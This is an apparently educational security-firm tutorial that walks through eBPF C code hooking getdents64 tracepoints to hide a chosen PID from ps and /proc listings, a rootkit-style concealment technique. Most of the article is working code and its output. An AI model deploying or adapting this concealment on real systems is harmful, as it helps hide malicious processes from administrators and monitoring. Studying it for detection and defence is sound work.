This article is a tutorial on how to create an eBPF program using a tracepoint.
If you are not familiar with eBPF, please refer to our introduction to eBPF, or to the official documentation.
To follow this article in the best conditions, we recommend you read part 1 which details the methodology used to conceal a PID.

In practice, how do you hide a PID from a user?

Note: This article is also available in french 🇫🇷

Aim

In this article, we’ll take a look at how eBPF works, using a practical example. We’ll try to hide a process identifier (PID) from a user. The previous article introduces the concepts surrounding the use of tracepoints in an eBPF program and the operation of the getdents64 syscall. This second part focuses mainly on the creation of code to conceal a PID.
The code we’ll be looking at is a revised version of the bad-bpf project presented by Patrick H. at DEF CON 29 in 2021. You’ll find the complete code on the Acceis repository.

The aim of this article is to provide a practical understanding of how to create an eBPF program capable of hiding a program’s PID on linux systems.
This article focuses on the program backend to highlight how the PID is masked within the kernel, without attaching detail to how the program is loaded into the kernel.

Summary of part 1

The previous article, showed that the ps command was similar to ls /proc and highlighted how the getdents64 system call works and how it can be used to hide a directory. The user defines a buffer in user space, which is then passed as a parameter to the system call and completed when the call is executed. This buffer contains as many entries of type struct linux_dirent64 as there are elements in the directory.
To hide a PID, iterate over this buffer and then delete the corresponding entry.

To browse a buffer without knowing its size, you need to iterate according to the byte size of each element, i.e. start from the buffer’s starting address and then increment a "position" in the buffer, incremented at each iteration by the size of the current element. In the case of linux_dirent64, the size is defined in its d_reclen parameter. So by adding this value to the starting buffer position, the data can be retrieved.

To hide an entry in the buffer, the simplest approach is to extend the length of the previous dirent (the value of its d_reclen), to its own length, plus the length of the dirent we wish to hide. So the previous dirent will be its own length plus that of the dirent to be hidden, making its reading "invisible" when the buffer is read.

Program initialization

To automate the injection of eBPF programs into the kernel, it is possible to use the ebpf-go library developed for go programs. The application’s front-end is written with Golang and uses this library. The Go code then runs in user space, injecting the eBPF code, written in C and then compiling, directly into the kernel.
These programs are therefore distinct from the eBPF programs they inject, and do not share the same memory space.

To keep things simple on the application front end, the eBPF code is injected using this library and is presented as follows:

func hideDir(dirname string) {
  bpfManager, err := BootstrapBPF(dirname)
  if err != nil {
    log.Fatal("Failed to bootstrap BPF:", err)
    return
  }
  bpfManager.handlePerfEvent()
  bpfManager.waitUntilExitCall()
}
  • BootstrapBPF is used to initialize eBPF programs with dirname the file name (or PID name) to be masked. This function is used to inject eBPF programs sys_enter_getdents64 and sys_exit_getdents64.
  • bpfManager.handlePerfEvent() creates a goroutine that waits for events returned by the eBPF program to be displayed in console mode in user space.
  • bpfManager.waitUntilExitCall() waits for the program to receive a stop signal before terminating the program.

Let’s not dwell on this frontend any further. All the logic for hiding a PID is to be found in the C backend.

When the tool is launched, the user defines the name of the PID (or directory) to be hidden (e.g. sudo ./bin/hide-dir 1337). This is sent to an eBPF map, which is then used when the various eBPF programs are triggered.

Definition of maps

To move data from one eBPF program to another, or between user space and kernel space, the kernel provides maps for storing data and moving it between these contexts. They can also be used to share data between several eBPF programs. There are different types of map for different needs.

For this project, 3 maps will be required:

struct {
  __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
  __type(key, u32);
  __type(value, u32);
} rb SEC(".maps");

struct {
  __uint(type, BPF_MAP_TYPE_HASH);
  __uint(max_entries, 10);
  __type(key, u32);
  __type(value, u64);
} map_dirent SEC(".maps");

struct {
  __uint(type, BPF_MAP_TYPE_ARRAY);
  __uint(max_entries, 1);
  __type(key, u32);
  __type(value, struct userspace_data);
} map_store_dirname SEC(".maps");
  • The map named rb is a ring buffer and is used to send events to user space. More information can be found in the dedicated documentation.
  • map_dirent is used to store the buffer containing entries (linux_dirents64) in the directory. This is a hashmap type map (key value).
  • map_store_dirname is the map used to retrieve the PID (or directory name) defined by the user. This is an array map. In our case, we only need one entry in this array to hide one directory at a time.

You can find full information on maps in the kernel documentation.

Types such as u8 u16 u32 u64 are provided in the vmlinux.h file. They are used to guarantee the consistency and accuracy of data sizes across different architectures, and their transformation into exact types is handled by the JIT compiler when the program is loaded into the kernel.

Retrieving the buffer containing directory entries

As stated in part 1, to delete our PID, we need to extract the buffer containing all directory entries. This buffer is empty in sys_enter_getdents64 since this point of attachment is made before executing syscall.

SEC("tp/syscalls/sys_enter_getdents64")
int handle_getdents_enter(struct trace_event_raw_sys_enter *ctx)
{
  u32 pid = bpf_get_current_pid_tgid() >> 32;

  u64 dirents_buf = ctx->args[1];
  bpf_map_update_elem(&map_dirent, &pid, &dirents_buf, BPF_ANY);
  return 0;
}

The above code extracts and stores the buffer in the map. The pid variable is used to identify the current process and is used in this case as the key for the map_dirent hashmap. You need a unique value inherent to a single process to avoid getting mixed up between different program triggers, and the pid lends itself well to this.

ctx->args is an array containing the syscall parameters. In the case of sys_enter_getdents64, ctx->args[1] refers to a struct linux_dirent64 * which is a buffer containing the various directory entries.
Thanks to the helper bpf_map_update_elem, the buffer is stored in the map for later use.

  • The elements of ctx->args are the parameters defined by the user during the system call. This means that they come from user space and therefore do not share the same memory as eBPF programs. This is important information for what follows.
  • dirents_buf is not a buffer of known size, so it is not possible to use it as a conventional array (e.g. dirents_buf[1]). But each linux_dirent64 structure follows on from each other in memory, so it is possible to reconstruct the types and access the next value by knowing the length of the current structure.

The next step is to retrieve the buffer from sys_exit_getdents64, check whether our PID is present in the directory list, and if so, delete it.

As a reminder, ps is actually similar to ls /proc.

Extracting the filled buffer and the directory to be hidden

SEC("tp/syscalls/sys_exit_getdents64")
int handle_getdents_exit(struct trace_event_raw_sys_exit *ctx)
{
  u64 pid = bpf_get_current_pid_tgid() >> 32;

  u64 * dirents_buf = get_dirent_buf(&pid);
  struct userspace_data * userspace_data = get_userspace_data();

  if (!dirents_buf || !userspace_data) return 0;
  ...
  return 0;
}

The above code extracts the buffer previously stored in the map map_dirent using get_dirent_buf. The key to retrieving the buffer is the pid, which is passed as a parameter to the function whose code is shown below:

u64 * get_dirent_buf(u64 * pid) {
  return (u64*)bpf_map_lookup_elem(&map_dirent, pid);
}

Once the buffer has been retrieved, we need to obtain the name of the directory to be hidden, as defined by the user when the program is launched. The get_userspace_data function is used, in the same way as get_dirent_buf, to extract this data from the map_store_dirname map. The returned structure contains the file name as a string and its size.

struct userspace_data {
  u8 dirname_to_hide[MAX_NAME_LEN];
  int dirname_len;
};

If the data is not present in the maps, the functions return a NULL pointer. You need to ensure that this is not the case to continue the program, in which case you simply need to terminate the program.

if (!dirents_buf || !userspace_data) return 0;

The verifier needs this kind of verification to be done so as not to harm the kernel’s security or proper operation.

The buffer patch

Global view

Now that our dirents_buf buffer has been populated with all the entries in the current directory (linux_dirent64), all that remains is to loop over each entry, then test whether any of them correspond to the directory we wish to hide.

SEC("tp/syscalls/sys_exit_getdents64")
int handle_getdents_exit(struct trace_event_raw_sys_exit *ctx)
{
  ...
  struct dirents_data_t dirents_data = {
    .bpos = 0,
    .userspace_data = userspace_data,
    .dirents_buf = dirents_buf,
    .buff_size = ctx->ret,
    .d_reclen = 0,
    .d_reclen_prev = 0,
    .patch_succeded = false,
  };

  bpf_loop(MAX_DIRENTS, patch_dirent_if_found, &dirents_data, 0);
  ...
  return 0;
}

Since the buffer is not an array of known size, you need to define the progress position at each iteration to know exactly which structure is being analyzed. bpos represents this progress position in the buffer (bpos stands for buffer position).

The helper function bpf_loop creates a loop which iterates from 0 to MAX_DIRENTS (here set to 10000) and executes a so-called callback function patch_dirent_if_found for each iteration.
This callback function patch_dirent_if_found takes as parameters the current index and a pointer to data of any type (in this case, dirents_data).
The aim is to have common data for each iteration to determine the current dirent according to a bpos position that will be incremented. So, thanks to the dirents_data_t structure, each iteration has access to the buffer, its position and size, information about the directory to be masked defined by the user, as well as two parameters which determine the size of the dirent (of the current and previous entry) and the last value which indicates whether the patch has been successful or not.

At the heart of patching

Understanding the patching process

Before going into the details of how the patch is made, we need to find an effective strategy for finding exactly which dirent corresponds to the directory to be masked.
The solution implemented is to extract the directory name dirent->d_name from the linux_dirent64 structure and compare each character with that of the file to be masked. In other words, a loop that iterates as many times as there are letters in d_name and compares each of the letters with those defined by the user.

Another option would have been to compare the memory of the 2 variables d_name and dirname_to_hide and make sure they had the same size. LLVM has a function specifically for this, __builtin_memcmp, but this function calls memcmp from glibc. As calls to external libraries are forbidden, the verifier will block this when loading into the kernel.

Preparing the patch

The loop is set to a fixed index (MAX_DIRENTS), as the verifier cannot rely on a dynamic value to prevent infinite loops. As the length of the dirents_buf buffer is dynamic, i.e. different from one directory to another, it is essential to exit the loop as soon as you have reached the end of the buffer.

int patch_dirent_if_found(u32 _, struct dirents_data_t *data)
{
  if(is_end_of_buff(data->bpos, data->buff_size)) return 1;

  u8 dirname[MAX_NAME_LEN];
  struct linux_dirent64 * dirent = get_dirent(*data->dirents_buf, data->bpos);
  ...
  return 0;
}

is_end_of_buff checks whether the position in the buffer is greater than the buffer size. The aim is to avoid overflow when retrieving dirent.

Here’s the code used to retrieve the current dirent entry:

struct linux_dirent64 * get_dirent(u64 dirents_buf, int bpos) {
  return (struct linux_dirent64 *)(dirents_buf + bpos);
}

The function takes dirents_buf, a 64-bit buffer, as a parameter. The pointers for each dirent are contiguous in memory, so you only need to know the length of the first to obtain the address of the second, and so on. This is the role of bpos.

Before comparing the name of the current directory with the one to be hidden, we need to determine the length of the current dirent and its name.

int patch_dirent_if_found(u32 _, struct dirents_data_t *data)
{
  ...
  read_user__reclen(&data->d_reclen, &dirent->d_reclen);
  read_user__dirname(dirname, dirent->d_name);

  struct userspace_data * userspace_data = data->userspace_data;
  ...
  return 0;
}

read_user__reclen and read_user__dirname are functions created specifically to ensure that data is "healthy". The dirents_buf buffer is a pointer to user space, which is a memory space distinct from that of the kernel. For security reasons, there is no memory sharing between the two. So a pointer is said to be "unsafe" when it comes from user space and needs to be verified. To do this, the kernel provides helpers (bpf_probe_read or bpf_probe_read_user_str) which take care of securely retrieving the data. In this case, the aim is to retrieve dirent->d_reclen and place the result in data->d_reclen and do the same for dirname. In the kernel, d_reclen represents the size of the current dirent. This can be used to calculate the position of the next dirent in the buffer.

Compare the name of the current directory with the one to be hidden

Once all this data has been correctly retrieved, the next step is to determine whether dirname and dirname_to_hide are identical.

To compare dirname and dirname_to_hide, a simple method is to test all the characters of both. To do this, you need to determine the smallest number of characters in either, and then use this value as a reference to loop back to this index.

int patch_dirent_if_found(u32 _, struct dirents_data_t *data)
{
  ...
  int max_str_len = get_str_max_len(userspace_data->dirname_to_hide, dirname, userspace_data->dirname_len);

  if (is_dirname_to_hide(max_str_len, dirname, userspace_data->dirname_to_hide)) {
    data->patch_succeded = remove_curr_dirent(data);
    return 1;
  }
  ...
}

max_str_len determines the number of characters to be tested, i.e. the number of characters present in dirname_to_hide.

is_dirname_to_hide compares the two strings dirname_to_hide and dirname.

bool is_dirname_to_hide(int max_str_len, u8 * dirname, u8 * dirname_to_hide) {
  int i = 0;
  for (; i < max_str_len; i++) {
    if (dirname[i] != dirname_to_hide[i]) return false;
  }
  return dirname[i] == 0x00;
}

The function returns false if the strings don’t contain the same data. For each iteration, each character is compared, and if no match is found, the function stops. If everything is valid, a final comparison is made to ensure that the variables are identical. Indeed, there is one use case that can occur, namely when dirname = 12345 and dirname_to_hide = 123. The loop tests the combinations, but does not ensure that dirname and dirname_to_hide are of the same length. To do this, you need to check that the last parameter of dirname is a null byte.

In C, a string is always followed by a zero byte (0x00) to mark the end.

If all characters match, patch buffer

To remove the dirent from the buffer, the simplest solution is to take the index of the previous dirent, and override the value of d_reclen by its value + that of the dirent to be removed (e.g. previous_d_reclen + current_d_reclen = new_d_reclen). This way, when the user browses the buffer, he won’t be able to read the contents of the dirent, as he won’t know its position in the buffer.

data->patch_succeded = remove_curr_dirent(data);

To remove the dirent, a number of elements are required, in several stages.

bool remove_curr_dirent(struct dirents_data_t * data) {
  struct linux_dirent64 *dirent_previous = get_dirent(*data->dirents_buf, (data->bpos - data->d_reclen_prev));
  u16 d_reclen_new = data->d_reclen + data->d_reclen_prev;
  return bpf_probe_write_user(&dirent_previous->d_reclen, &d_reclen_new, sizeof(d_reclen_new)) == 0;
}

First, you need to retrieve the dirent from the previous iteration, then calculate its new length. And finally, update its value in the buffer using the bpf_probe_write_user helper.

As a reminder, the dirents_buf buffer is a pointer to user space. So its value cannot be directly modified from the eBPF program. This is why you need to use the bpf_probe_write_user helper.

remove_curr_dirent returns a Boolean depending on the success or failure of the rewrite.

If all characters do not match, increment bpos

If is_dirname_to_hide returns false, increment the position in the buffer so that the next iteration searches for the next dirent.

int patch_dirent_if_found(u32 _, struct dirents_data_t *data)
{
  ...
  if (is_dirname_to_hide(max_str_len, dirname, userspace_data->dirname_to_hide)) {
    ...
    return 1;
  }
  data->d_reclen_prev = data->d_reclen;
  data->bpos += data->d_reclen;
  return 0;
}

d_reclen_prev here is used to track the size of the previous dirent and thus retrieve its position in the buffer when remove_curr_dirent is patched.

Sending notification to the user

Once the patch has been successfully completed, the bpf_loop loop ends. If a patch has been performed successfully, a notification can be sent.

SEC("tp/syscalls/sys_exit_getdents64")
int handle_getdents_exit(struct trace_event_raw_sys_exit *ctx)
{
  ...
  if (dirents_data.patch_succeded) {
    notify_userspace(ctx, pid);
  }

  bpf_map_delete_elem(&map_dirent, &pid);
  return 0;
}

The notification is sent using the ring buffer defined earlier in the notify_userspace function.

long notify_userspace(void *ctx, u64 pid) {
  struct rb_event e = {
    .overwrite_succed = true,
    .pid = pid,
  };
  bpf_get_current_comm(&e.command, sizeof(e.command));
  return bpf_perf_event_output(ctx, &rb, BPF_F_CURRENT_CPU, &e, sizeof(e));
}

The data sent back to user space by the ring buffer is a rb_event structure, which can contain any type of data. In this case, the PID of the process performing the syscall and the command currently being executed.

And the result?

Once the project has been compiled, all that remains is to execute it.
If, for example, we want to mask the PID 53745.

sudo ./bin/hide-pid 53745

To load an eBPF program, you almost always need administrator rights, as the program is in the kernel.

In another terminal, by executing the ps command, we can see the presence of the process.

ps -ef | grep 53745

We can now see that the PID is no longer present in the list.
A notification is then received by our frontend, since our dirent has been correctly patched, and a message is displayed in the console.

2024/01/31 21:33:29 Hiding "53745" for process "ps" (pid: 76778)

The full code is available on GitHub.

About the author

Article written by Tristan d’Audibert aka Sathi, cybersecurity engineer apprentice at ACCEIS.